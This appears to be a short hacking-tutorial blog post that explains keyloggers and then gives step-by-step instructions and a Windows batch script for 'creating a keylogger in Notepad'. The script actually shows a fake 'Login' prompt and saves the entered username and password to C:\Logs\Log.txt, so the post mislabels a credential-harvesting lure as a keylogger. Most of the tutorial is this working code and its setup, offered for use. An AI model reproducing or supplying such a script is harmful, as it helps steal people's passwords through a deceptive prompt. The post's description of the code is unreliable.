What Are #Keyloggers?
A keylogger is a type of surveillance software (considered to be either software or spyware) that has the capability to record every keystrokeyou make to a log file, usually encrypted. A keylogger recorder can record instant messages, e-mail, and any information you type at any time using your keyboard. The log file created by the keylogger can then be sent to a specified receiver. Some keylogger programs will also record any e-mail addresses you use and Web site URLsyou visit.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party.HOw To Create a Keylogger LATEST.
#Creating Keylogger Using Notepad 2015-:-
- First of all you need to open notepad in your windows by pressing Window button and then entering notepad.
- Now in notepad copy and paste the below code in it. @echo off
color a
title Login
echo Please Enter Your Email Address And Password
cd “C:\Logs”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
Now save this file as Logs.bat in your desktop.
- Now create a new folder named logs. (Note that keylogger will only work if the folder name is logs).
- Cut this folder and paste it into drive C:\ .
- Now test your file Log.bat and then after entering the Username and password open the folder in C drive and see all saved key logs there as a text file created there automatically.
- Thats it you are done, you have successfully created a keylogger in notepad.